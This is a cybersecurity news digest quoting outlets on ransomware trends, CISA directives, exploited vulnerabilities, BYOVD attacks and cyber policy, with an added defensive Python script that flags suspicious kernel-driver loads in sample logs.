    • “Ransomware isn’t slowing down. It’s scaling, adapting, and finding new ways to slip past defenses that many organizations still trust implicitly.  
    • “The Ransomware Reality Check 2026 infographic paints a clear, data-driven picture of the risk landscape ahead: from skyrocketing demands to sophisticated execution methods that beat traditional detection technologies.”  
  • Per Security Week,
    • “Mere data exfiltration is no longer a lucrative approach for ransomware groups, and threat actors may increasingly rely on encryption to regain leverage, Coveware notes in a new report.
    • “Following a series of highly successful data-exfiltration-only attacks conducted by known groups such as Cl0p, other ransomware groups adopted the trend, stealing victims’ data without encrypting it.
    • “The campaigns targeting MOVEit, Cleo, and Oracle E-Business Suite (EBS) customers are proof that the approach no longer delivers return on investment, Coveware says.
    • “Cl0p, it explains, started this trend with a simple strategy: it acquired an exploit for a zero-day vulnerability in a popular enterprise file transfer or data storage product, hacked as many instances as possible for data exfiltration, and extorted each compromised entity into paying a ransom.
    • “In 2021, the group likely made tens of millions of dollars using this tactic in the Accellion campaign, when over 25% of the impacted organizations likely paid a ransom. Roughly 20% of the entities impacted by the GoAnywhere MFT hack also paid a ransom.
    • “In the subsequent campaigns, however, the victims’ willingness to pay dropped significantly: less than 2.5% of those affected by the MOVEit breach paid, and almost none paid in the Cleo and Oracle EBS incidents, Coveware says in its latest ransomware trends report.”
  • Per Cyberscoop,
    • “Ransomware groups crop up like weeds, angling for striking positions in a crowded field rife with turnover, infighting and unbridled competition. Yet, they rarely emerge, as 0APT did late last month, claiming roughly 200 victims out of the gate.
    • “Researchers have thus far seen no evidence confirming 0APT attacked any of its alleged victims, which include high-profile organizations. Alleged victim data samples and the structure and size of placeholder file trees published by 0APT place further doubt on the group’s supposed criminal escapades.
    • “Most signs suggest the group is running a massive hoax, but at least some of the threat 0APT poses is grounded in truth. The group’s inflated pretense may be a ruse to create a sense of momentum, gain recognition and attract affiliates.
    • “While 0APT is probably bluffing about the victims it has already compromised, it is not bluffing on the technical capabilities of its actual ransomware,” Cynthia Kaiser, senior vice president at Halcyon’s ransomware research center, told CyberScoop.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • “The European Union approved Google’s $32 billion acquisition of cybersecurity startup Wiz, a win for the Alphabet (GOOGL) unit’s * * *
    • “Google announced the all-cash deal in March 2025, betting that bringing Wiz under its cloud business would help it fast-track improvements in cloud security and enhance its ability to use multiple clouds, both trends that have gathered pace in the artificial-intelligence era.
    • “Wiz provides cybersecurity software for cloud computing and has presences in New York; Arlington, Virginia; London and Tel Aviv.
    • “The deal—cleared by U.S. antitrust authorities in November last year—was flagged to the EU’s merger watchdog for screening in January.”
  • Cyberscoop relates,
    • “Proofpoint announced Thursday [February 12] it has acquired Acuvity, an AI security startup, as the cybersecurity company moves to address security risks stemming from widespread corporate adoption of agentic AI.
    • “The acquisition strengthens Proofpoint’s capabilities in monitoring and securing AI-powered systems that are increasingly handling sensitive business functions across enterprises.
    • “Financial terms of the deal were not disclosed, but Ryan Kalember, Proofpoint’s chief strategy officer, told CyberScoop that the acquisition was beyond a pure “technology acquisition,” with Acuvity’s engineering team slated to join the California-based company. 
    • “Acuvity specializes in visibility and governance for AI applications, including the ability to track how employees and automated systems interact with external AI services and protect custom AI models developed within organizations. The startup’s platform monitors AI usage across multiple deployments, from web browsers to specialized infrastructure including Model Context Protocol (MCP) servers and locally installed AI tools.”
  • Per a February 13 CISA news release,
    • “For years, CISA has responded to an unending wave of cyber incidents targeting edge devices embedded in the Nation’s federal networks and critical infrastructure. The common culprit? Unsupported hardware and software residing on the edge of organizational networks that vendors are no longer maintaining.
    • “Nation-state adversaries have seized these weak points, exploiting them to gain unauthorized access, maintain persistence, and compromise sensitive data. These neglected devices are more than just vulnerabilities; they threaten the Nation’s security, privacy, and resilience.
    • “As the operational lead for federal cybersecurity, CISA recently took a large step toward addressing this systemic risk by issuing Binding Operational Directive (BOD) 26-02, a mandate for federal civilian agencies to identify and replace end-of-support (EOS) edge devices, stay current with software updates, and patch known vulnerabilities. While directed to federal agencies, we strongly encourage all organizations to adopt similar actions.
    • “However, we as a community can and must do more. Managing the lifecycles of hardware and software products can quickly become a daunting, resource-intensive task—especially without an efficient way to determine the EOS status for hardware and software.
    • “Enter OpenEoX: a machine-readable, international standard that transforms how product lifecycle information is exchanged across software, hardware, services, and AI models. By introducing much-needed standardization and automation, OpenEoX brings transparency, efficiency, and unity to asset management. By integrating OpenEoX across the community, both hardware and software producers and consumers can together turn the tide on one of the most serious cyber threats facing the Nation: EOS hardware and software.” * * *
  • Meritalk relates,
    • The FBI Cyber Division’s latest initiative, Operation Winter SHIELD, is growing as more field offices join the cybersecurity defense campaign that aims to turn lessons from investigations into high-impact actions that organizations can take to strengthen their defenses. 
    • The bureau launched Operation Winter SHIELD on Jan. 28 as a two-month effort that spotlights one of 10 “high-impact actions” each week. The initiative is designed to help organizations reduce common breach pathways and harden critical infrastructure systems against nation-state and criminal cyber threats. 
    • Since its announcement, numerous FBI field offices across the nation have voiced their support for the operation – some of the latest field offices to join this week include Seattle, Philadelphia, and Anchorage.
    • In a video announcement, FBI Cyber Division Assistant Director Brett Leatherman said the campaign distills insights from real-world investigations into practical steps that organizations can take immediately. 
    • “Every winter storms test our infrastructure. Power grids, water systems, and supply chains are pushed to their limits, but the most critical threats to infrastructure don’t come from the weather. They come through our networks,” Leatherman said. 
    • The 10 actions outlined by the FBI include:
      • Adopt phish-resistant authentication 
      • Implement a risk-based vulnerability management program 
      • Track and retire end-of-life technology on a defined schedule 
      • Manage third-party risk 
      • Protect security logs and preserve them for an appropriate time period 
      • Maintain offline immutable backups and test restoration 
      • Identify, inventory, and protect internet-facing systems and services 
      • Strengthen email authentication and malicious content protections 
      • Reduce administrator privileges 
      • Exercise your incident response plan with all stakeholders 
  • Per Dark Reading,
    • “Microsoft Under Pressure to Bolster Defenses for BYOVD Attacks
    • “Threat actors are exploiting security gaps to weaponize Windows drivers and terminate security processes in targeted networks, and there may be no easy fixes in sight.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy front,

  • The Wall Street Journal reports,
    • “After months of partisan wrangling, a temporary extension on Tuesday of legislation aimed at encouraging firms to share cyberattack intelligence with Washington might be too little, too late for corporate cybersecurity leaders. 
    • “The seesaw effect we saw last year has eroded the trust that intel sharing needs to be built on,” said Timothy Youngblood, an investor who led cybersecurity teams at T-Mobile, McDonald’s and Kimberly-Clark. Before providing sensitive details of a data breach or ransomware attack, companies need to be assured “they will not have the information used against them,” Youngblood said.
    • “The Cybersecurity Information Sharing Act, or CISA, provides liability and antitrust protections for companies that share attack data with federal agencies. Created in 2015 with a 10-year sunset clause, the act lapsed twice over the past four months as lawmakers clashed over proposed revisions. It was extended this week [to September 30, 2026] as part of a broader spending bill approved by Congress and signed by President Trump.  
    • “But an eight-month shelf life—and on-again off-again status—is unlikely to encourage hacked companies to risk legal or reputational damage by sharing sensitive data, especially in the wake of costly downtime, cybersecurity experts said. Staffing and resource cuts over the past year at the federal Cybersecurity and Infrastructure Security Agency, which shepherds private-public intelligence sharing, are adding to their concerns, they said.
    • “Temporary extensions are Band-Aids,” said Kevin Greene, public sector chief cybersecurity technologist at security firm BeyondTrust. Prolonged uncertainties, he said, will “absolutely create some friction in information sharing.”
  • Cyberscoop relates,
    • “The Trump administration needs help from industry to reduce the cybersecurity regulatory burden and to back important cyber legislation on Capitol Hill, among other areas, National Cyber Director Sean Cairncross said Tuesday.
    • “You know your regulatory scheme better than I do: Where there’s friction, where there’s frustration with information sharing, what sort of information is shared, the process through which it’s shared,” he said. “It is helpful for us to hear that and have that feedback so that we can address it, engage it and try to make it better.”
    • “The Trump administration is interested in being a partner with industry rather than a “scold,” Cairncross said at an Information Technology Industry Council event. The Biden administration sought to impose more cybersecurity rules on the private sector than prior administrations.”
  • Cybersecurity Dive adds,
    • “Cairncross’s comments come as the White House prepares to unveil its five-page national cybersecurity strategy, which will focus heavily on streamlining regulations to reduce the burden on industry, including critical infrastructure organizations.
    • “The White House wants to revise the current patchwork of cybersecurity regulations “so that form follows function rather than [the rules being] a compliance checklist,” said Cairncross, who has led the relatively new Office of the National Cyber Director since August.” * * *
    • “Cairncross did not provide a timeline for the strategy’s release, but he said the White House would publish it “sooner rather than later.” The goal of the brief document, he explained, is “to point a direction for the USG to go so resources and effort can be lined up.”
  • and
    • “Governments should work closely with the private sector when designing and detailing their national cybersecurity strategies, a prominent think tank said in a report published on Monday.
    • “Active participation from the private sector, particularly large technology, telecommunications, and cybersecurity firms, is critical throughout the strategy’s development,” the Center for Cybersecurity Policy and Law (CCPL) said in its white paper. “The private sector can help not only support but also deliver on the government’s cybersecurity objectives and is key to a secure and resilient nation.”
  • and
    • “The Trump administration is making progress on creating an information sharing and analysis center for the AI industry to improve its ties with the government as AI cyber threats proliferate, a U.S. official said on Tuesday.
    • “The administration is absolutely committed to making sure that we’re supporting this industry, making sure that we’re going to foster information sharing,” Nick Andersen, executive assistant director for cybersecurity at the Cybersecurity and Infrastructure Security Agency, said during a talk at an event hosted by the Information Technology Industry Council. “We just want to make sure we take the opportunity to get that relationship right.”
  • Federal News Network shares five updates on the Trump Administration’s cybersecurity agenda.
    • Six-pillar national cyber strategy
    • CIRCIA update
    • AI-ISAC in development
    • AI security policy framework
    • CIPAC replacement coming soon?
  • DefenseScoop notes,
    • “Marine Corps Maj. Gen. Lorna Mahlock was confirmed by the Senate on Friday evening [January 30] as deputy commander of U.S. Cyber Command, where she could have an outsized influence as the organization prepares for new leadership and other major changes.
    • “She was nominated for the position by President Donald Trump.
    • “Her Senate confirmation, which happened via voice vote, means she’ll also pin on a third star and become a lieutenant general.
    • “Mahlock brings deep cyber knowledge and background to her new role.”
  • Per Cybersecurity Dive,
    • “The Federal Communications Commission is warning telecommunications companies to regularly patch their systems, enable multifactor authentication and segment their networks to avoid falling victim to ransomware attacks.
    • “Recent events show that some U.S. communications networks are vulnerable to cyber exploits that may pose significant risks to national security, public safety, and business operations,” the FCC’s Public Safety and Homeland Security Bureau said in a Jan. 29 alert.”

From the cybersecurity vulnerabilities and breaches front.

  • Cyberscoop reports,
    • “A Cybersecurity and Infrastructure Security Agency order published Thursday [February 4, 2026] directs federal agencies to stop using “edge devices” like firewalls and routers that their manufacturers no longer support.
    • “It’s a stab at tackling one of the most persistent and difficult-to-manage avenues of attack for hackers, a vector that has factored into some of the most consequential and most common types of exploits in recent years. New edge-device vulnerabilities surface frequently.
    • “Under the binding operational directive CISA released Thursday, federal civilian executive branch (FCEB) agencies must inventory edge devices in their systems that vendors no longer support within three months, and replace those on a dedicated list with supported devices within one year.”
  • The American Hospital Association News tells us,
    • “The National Institute of Standards and Technology Feb. 2 published details on a critical vulnerability that impacted Notepad++, a free, open-source text and source code program widely used by several industries, including health care. The vulnerability impacted an update component affecting iterations of the program prior to version 8.8.9, and allowed attackers to gain access to and disrupt the update process. According to the program’s developer, attacks that occurred from June to November 2025 were likely executed by a sophisticated nation-state threat actor.”
  • Cybersecurity Dive informs us,
    • “Cybercrime “began its shift toward an AI-driven future” in 2025, the security firm Malwarebytes said in a report published Tuesday that charted AI’s influence on the rapidly growing hacking ecosystem.
    • “AI is making cyberattacks faster and more effective through deepfakes, vulnerability discovery, autonomous ransomware attacks and growing connectivity between AI models and penetration testing tools, according to the report.
    • “Malwarebytes urged businesses to “shrink their attack surfaces, harden identity systems, close blind spots, accelerate remediation, and adopt continuous monitoring.”
  • and
    • “Hackers working for an Asian government have breached at least 70 government agencies and critical infrastructure organizations in 37 countries over the past year as part of an espionage campaign likely aimed at collecting information about rare earth minerals, trade deals and economic partnerships, Palo Alto Networks said in a report published on Thursday.
    • “While this group might be pursuing espionage objectives,” researchers with the company’s Unit 42 group wrote in the report, “its methods, targets and scale of operations are alarming, with potential long-term consequences for national security and key services.”
    • “The security firm provided indicators of compromise and described the threat actor’s techniques and infrastructure.”
  • CISA added six known exploited vulnerabilities to its catalog this week.
    • February 3, 2026
      • CVE-2021-39935 GitLab Community and Enterprise Editions Server-Side Request Forgery (SSRF) Vulnerability
        • Cyber Press discusses this KEV here.
      • CVE-2025-40551 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
        • Cybersecurity Dive discusses this KEV here.
      • CVE-2019-19006 Sangoma FreePBX Improper Authentication Vulnerability
      • CVE-2025-64328 Sangoma FreePBX OS Command Injection Vulnerability 
        • The Hacker News discusses these KEVs here.
    • February 5, 2026
      • CVE-2025-11953 React Native Community CLI OS Command Injection Vulnerability
        • Security Week discusses this KEV here.
      • CVE-2026-24423 SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability
        • Bleeping Computer discusses this KEV here.
  • Dark Reading points out, “CISA Makes Unpublicized Ransomware Updates to KEV Catalog
    • “A third of the “flipped” CVEs affected network edge devices, leading one researcher to conclude, ‘Ransomware operators are building playbooks around your perimeter.'”
  • Cyberscoop adds,
    • “Attackers are again focusing on a familiar target in the network edge space, actively exploiting two critical zero-day vulnerabilities in Ivanti software that allows administrators to set mobile device and application controls. 
    • “The vulnerabilities — CVE-2026-1281 and CVE-2026-1340 — each carry a CVSS rating of 9.8 and allow unauthenticated users to execute code remotely in Ivanti Endpoint Manager Mobile (EPMM). Ivanti did not say when the earliest known date of exploitation occurred but warned that a “very limited number of customers” were attacked before it disclosed and addressed the defects Thursday [January 29, 2026]. * * *
    • “The Cybersecurity and Infrastructure Security Agency has flagged 31 Ivanti defects on its known exploited vulnerabilities catalog since late 2021. At least 19 defects across Ivanti products have been exploited in the past two years. 
    • “The agency added CVE-2026-1281 to the catalog Thursday, but not CVE-2026-1340. Both defects have been exploited, according to watchTowr. Yet, a spokesperson for Ivanti said the vulnerabilities have not been chained together for exploitation.
    • “The latest code-injection vulnerabilities demonstrate attackers are focusing on EPMM in particular of late. Ivanti disclosed a separate pair of vulnerabilities in the same product in May 2025.” 
  • Cybersecurity Dive informs us,
    • “Two months after a critical vulnerability was disclosed in React Server Components, researchers warn of a significant change in threat activity targeting the flaw. 
    • “The original vulnerability, tracked as CVE-2025-55182, allows an unauthenticated attacker to achieve remote code execution due to unsafe deserialization of payloads. 
    • “The initial wave of attacks in December led to hundreds of systems being compromised as state-linked threat groups and other actors engaged in widespread exploitation. The vulnerability, dubbed React2Shell, has been targeted in a wide range of industries since it was discovered in late November.
    • “Researchers from GreyNoise on Monday reported a distinctive change over the prior seven days, as more than half of the threat activity now emanated from only two IP addresses, according to a blog post. Before the change, there were 1,083 unique sources linked to threat activity, according to researchers.
    • “GreyNoise said its sensors detected more than 1.4 million attempts to exploit CVE-2025-55182 during the seven-day period.
    • “Researchers warned the exploitation appears to be focused on the developer community.” 
  • Per Dark Reading,
    • “Threat actors are using a forensic tool’s Windows kernel driver to kill security products, despite the fact the driver’s digital certificate was revoked more than a decade ago.
    • “In a blog post Wednesday, security researchers at Huntress detailed how the company responded to an intrusion earlier this month in which the threat actor used compromised SonicWall SSL VPN credentials for initial access to the victim’s network. But the real kicker was how the attacker avoided detection: they weaponized the Windows kernel driver of a legitimate forensic toolset called EnCase to disable security products across the network.”
    • “The attack technique is known as bring-your-own-vulnerable-driver (BYOVD), which involves taking advantage of the elevated privileges and kernel-level access of a driver to terminate security processes before an intrusion is detected. Threat actors have increasingly used drivers to disable endpoint detection and response (EDR) platforms, often in ransomware attacks; these tools are commonly known as EDR killers.”  
  • Per SC Media,
    • “More than 300 malicious OpenClaw skills hosted on ClawHub spread malware including the Atomic macOS Stealer (AMOS), keyloggers and backdoors, Koi Security reported Sunday.  
    • “OpenClaw, formerly known as Moltbot and Clawdbot, is an open-source AI agent that has recently gained significant popularity as a personal and professional assistant.
    • “ClawHub is an open-source marketplace for OpenClaw “skills,” which are tools OpenClaw agents can install to enable new capabilities or integrations.
    • “Koi Security Researcher Oren Yomtov discovered the malicious skills in collaboration with his own OpenClaw assistant named Alex, according to Koi Security’s blog post, which is written from Alex’s perspective.
    • “Yomtov and Alex audited all 2,857 skills available on ClawHub at the time of their investigation, and discovered that 341 were malicious, with 335 seemingly tied to the same campaign.”
  • Per Security Week,
    • “The big takeaway from 2026 onward is the arrival and increasingly effective use of AI, and especially agentic AI, that will revolutionize the attack scenario. The only question is how quickly.
    • “Michael Freeman, head of threat intelligence at Armis, predicts, “By mid-2026, at least one major global enterprise will fall to a breach caused or significantly advanced by a fully autonomous agentic AI system.”
    • “These systems, he continues, “use reinforcement learning and multi-agent coordination to autonomously plan, adapt, and execute an entire attack lifecycle: from reconnaissance and payload generation to lateral movement and exfiltration. They continuously adjust their approach based on real-time feedback. A single operator will now be able to simply point a swarm of agents at a target.”

From the ransomware front,

  • Bleeping Computer reports today,
    • “A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services.” * * *
    • “BridgePay Network Solutions confirmed late Friday that the incident disrupting its payment gateway was caused by ransomware.
    • “In an update posted Feb. 6, the company said it has engaged federal law enforcement, including the FBI and U.S. Secret Service, along with external forensic and recovery teams.
    • “Initial forensic findings indicate that no payment card data has been compromised,” the company said, adding that any accessed files were encrypted and that there is currently “no evidence of usable data exposure.”
  • The Rhode Island Current tells us,
    • “A state vendor and major provider of workers’ compensation insurance in Rhode Island confirmed it was the victim of a cyberattack in January.   
    • “The Beacon Mutual Insurance Company posted about the Jan. 14 incident to its website around noon Thursday, following inquiries from Rhode Island Current earlier in the day. The requests for comment were prompted by Beacon’s appearance on public websites that list and track recent reports of ransomware — a genre of malware characterized by making users’ files encrypted and inaccessible unless they pay a price.
    • “Yes, this was a ransomware attack,” Michelle N. Pelletier, the assistant vice president of marketing and communications at the Warwick company, confirmed over email late Thursday afternoon.
    • “But Pelletier added that not all was lost, and that the company’s production environment — or the live systems that users interact with directly — remained safe from harm.  
    • “Fortunately, our production environment was not encrypted, and we were able to resume normal operations on January 20,” Pelletier wrote.”  
  • Security points out,
    • “If battling ransomware isn’t challenging enough, these attacks have undergone a significant metamorphosis, with attackers shedding their encryption-based model for one of pure exfiltration. The result? A more stealthy, discreet approach that successfully bypasses traditional defenses to snatch sensitive data and employ a double or triple extortion scheme. 
    • “With pure exfiltration, businesses don’t realize they’re a victim until it’s too late.” 
  • Security Week adds,
    • “Data allegedly pertaining to over 5 million Panera Bread customers has emerged online after hackers failed to extort the US bakery-cafe chain.
    • “The ShinyHunters extortion group has claimed the theft of roughly 14 million records from Panera Bread, after compromising a Microsoft Entra single-sign-on (SSO) code.
    • “The attack falls in line with recent ShinyHunters attacks that rely on voice phishing (vishing) and SSO authentication to access victim organizations’ cloud-based software-as-a-service (SaaS) environments.
    • “Last week, ShinyHunters published on its Tor-based leak site a 760GB archive allegedly containing the sensitive information stolen from Panera Bread.
    • “According to the data breach notification site Have I Been Pwned, the data was leaked after the hackers failed to extort the food chain.
    • “The archive includes 5.1 million unique email addresses and likely impacts as many Panera customers. Associated information such as names, addresses and phone numbers was also present in the leak.”
  • Security.com lets us know,
    • “A recent Black Basta attack campaign was notable because the ransomware contained a bring-your-own-vulnerable-driver (BYOVD) defense evasion component embedded within the ransomware payload itself.
    • “Normally the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software. However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself. 
    • “BYOVD is by far the most frequently used technique for defense impairment these days. Generally, attackers will deploy a signed vulnerable driver to the target network, which they then exploit to elevate privileges and disable security software. Since the vulnerable drivers operate with kernel-mode access, they can be used to terminate processes, making them an effective tool for disrupting security measures. In most cases, the vulnerable driver is deployed along with a malicious executable, which will use the driver to issue commands.”
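    The two BYOVD passages above (Dark Reading’s EnCase case with a revoked certificate, and this Black Basta write-up with a bundled NSecKrnl driver) both come down to the same defender question: which kernel drivers loaded on this host, and should they have? The following is an added example, not code from Huntress, Symantec, or any vendor cited here. It reads driver-load records modelled on the fields Sysmon Event ID 6 (“Driver loaded”) emits (ImageLoaded, Hashes, Signed, Signature, SignatureStatus) and flags the indicators a hunt would look for: a hash on a vulnerable-driver blocklist, a signature whose status is not Valid (revoked or expired), an unsigned driver, or a load path outside the normal driver directories. The sample events and the blocklist hash are constructed placeholders; in practice the hash set would be populated from Microsoft’s vulnerable driver blocklist or the LOLDrivers project, and the log lines would come from the SIEM.

```python
"""Triage driver-load events for bring-your-own-vulnerable-driver (BYOVD) indicators.

Added example for the Cybersecurity Saturday digest; not code from any cited vendor.
Records are constructed key=value lines modelled on Sysmon Event ID 6 fields.
"""
import re
from dataclasses import dataclass

# Constructed placeholder entry. A real hunt loads SHA256 values from
# Microsoft's vulnerable driver blocklist or the LOLDrivers project.
KNOWN_VULNERABLE_SHA256 = {
    "11" * 32: "placeholder: known-vulnerable kernel driver",
}

# Directories production drivers are expected to load from (lower-case prefixes).
EXPECTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)

# key=value tokens; values may be double-quoted to allow spaces and backslashes.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


@dataclass
class DriverLoad:
    utc_time: str
    image: str
    sha256: str
    signed: bool
    signature: str
    signature_status: str


def parse_event(line: str) -> DriverLoad:
    """Parse one constructed driver-load record into a DriverLoad."""
    fields = {}
    for key, raw in _KV.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    # Sysmon packs hashes as "SHA256=...,MD5=..."; keep only what we need.
    hashes = dict(h.split("=", 1) for h in fields.get("Hashes", "").split(",") if "=" in h)
    return DriverLoad(
        utc_time=fields.get("UtcTime", ""),
        image=fields.get("ImageLoaded", ""),
        sha256=hashes.get("SHA256", "").lower(),
        signed=fields.get("Signed", "false").lower() == "true",
        signature=fields.get("Signature", ""),
        signature_status=fields.get("SignatureStatus", ""),
    )


def assess(event: DriverLoad) -> list[str]:
    """Return the BYOVD indicators present on one driver load (empty list = benign)."""
    reasons = []
    if event.sha256 in KNOWN_VULNERABLE_SHA256:
        reasons.append("hash on vulnerable-driver blocklist")
    if not event.signed:
        reasons.append("unsigned driver")
    elif event.signature_status.lower() != "valid":
        # Covers Revoked and Expired: a revoked cert still loads on many hosts.
        reasons.append(f"signature status {event.signature_status}")
    if not event.image.lower().startswith(EXPECTED_DRIVER_DIRS):
        reasons.append("loaded from unexpected directory")
    return reasons


def triage(lines):
    """Return [(image_path, [reasons]), ...] for every record with at least one indicator."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append((event.image, reasons))
    return findings


# Constructed sample: one legitimate Microsoft driver, one driver with a revoked
# certificate matching the blocklist, one unsigned driver dropped in Temp.
SAMPLE_EVENTS = r"""
UtcTime=2026-02-06T14:02:11 ImageLoaded="C:\Windows\System32\drivers\ndis.sys" Hashes=SHA256=2222222222222222222222222222222222222222222222222222222222222222 Signed=true Signature="Microsoft Windows" SignatureStatus=Valid
UtcTime=2026-02-06T14:05:40 ImageLoaded="C:\Users\Public\forensic_kmode.sys" Hashes=SHA256=1111111111111111111111111111111111111111111111111111111111111111 Signed=true Signature="Example Forensic Vendor (constructed)" SignatureStatus=Revoked
UtcTime=2026-02-06T14:05:52 ImageLoaded="C:\Windows\Temp\nskrnl_test.sys" Hashes=SHA256=3333333333333333333333333333333333333333333333333333333333333333 Signed=false Signature="" SignatureStatus=Unavailable
"""

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS.splitlines()):
        print(f"{image}: {', '.join(reasons)}")
```

The signature check matters more than the path check: the EnCase driver in the Dark Reading item loaded despite a certificate revoked a decade earlier, so a rule that only trusts “Signed=true” misses exactly this case. The path heuristic is a weaker signal (legitimate installers sometimes stage drivers elsewhere) and is best used to rank findings rather than alert on its own.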
  • Bleeping Computer relates,
    • “Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider.
    • “Researchers at cybersecurity company Sophos observed the tactic while investigating recent ‘WantToCry’ ransomware incidents. They found the attackers used Windows VMs with identical hostnames, suggesting default templates generated by ISPsystem’s VMmanager.
    • “Diving deeper, the researchers discovered that the same hostnames were present in the infrastructure of multiple ransomware operators, including LockBit, Qilin, Conti, BlackCat/ALPHV, and Ursnif, as well as various malware campaigns involving RedLine and Lumma info-stealers.”
  • Per Dark Reading,
    • “The operators of DragonForce, a ransomware-as-a-service outfit that first surfaced in 2023, appear to be drawing heavily from the organized crime playbook, creating a cartel and attempting to bring mafia-style territorial organization — and a bit of muscle — to the ransomware ecosystem.
    • “A detailed analysis by LevelBlue showed the group has recently shifted its business model to one where customers — or affiliates — of its service can create their own brands while still operating under a blossoming DragonForce cartel umbrella.” * * *
    • “DragonForce has established itself as a relatively major player in the ransomware ecosystem since launching activities in 2023. Though not as big as rivals like Akira and Qilin, it has commanded some attention for its aggressive marketing and outreach. As of July 2025, the company had notched at least 250 victims based on its data leak site, according to Check Point Research.”

From the cybersecurity defenses front,

  • Cyberscoop reports,
    • “Following a series of high-profile cyberattacks, boards of directors are now requiring their organizations to take greater responsibility for the risks posed by enterprise resource planning (ERP) systems. The Jaguar Land Rover (JLR) incident in Sept. 2025 illustrates the severe consequences of such attacks. The cyberattack forced JLR to halt production for six weeks, making it the costliest cyberattack in Britain’s history. The company’s revenue declined 24 percent that quarter, accounting for potentially over a $1.2 billion drop in earnings, and subsequently reported a 43.3% wholesale sales volume drop the following quarter.
    • “For decades, organizations have treated ERP systems like SAP as back-office workhorses. However, the JLR incident—carried out by the cybercrime group ShinyHunters—has thrust ERP systems into the spotlight. That shift in attention is critical: today, 90% of the Fortune 500 use SAP, making these systems “crown jewel” assets that require the highest level of protection.
    • “The threat is escalating. A recent Google Cloud Security report forecasts that ransomware operations specifically designed to target critical enterprise applications such as ERP systems will emerge in 2026, forcing organizations to make quick ransom payments and sacrifice business resilience. 
    • “In our roles as board members, advisers, and cybersecurity CEOs, we’re witnessing a fundamental shift in how organizations approach ERP security: the conversation has moved from compliance to survival. Organizations are grappling with critical questions: Who owns the risk? What is our recovery time? Can we patch critical ERP vulnerabilities within 72 hours? Do we have visibility inside the application?”
  • Help Net Security explains where NSA zero trust guidance aligns with enterprise reality.
  • This HHS Inspector General’s report points out “Security Controls to Enhance Its Ability to Prevent and Detect Cyberattacks.”
  • Tech Target describes “five steps to ensure HIPAA compliance on mobile devices.”
  • Here is a link to Dark Reading’s CISO Corner.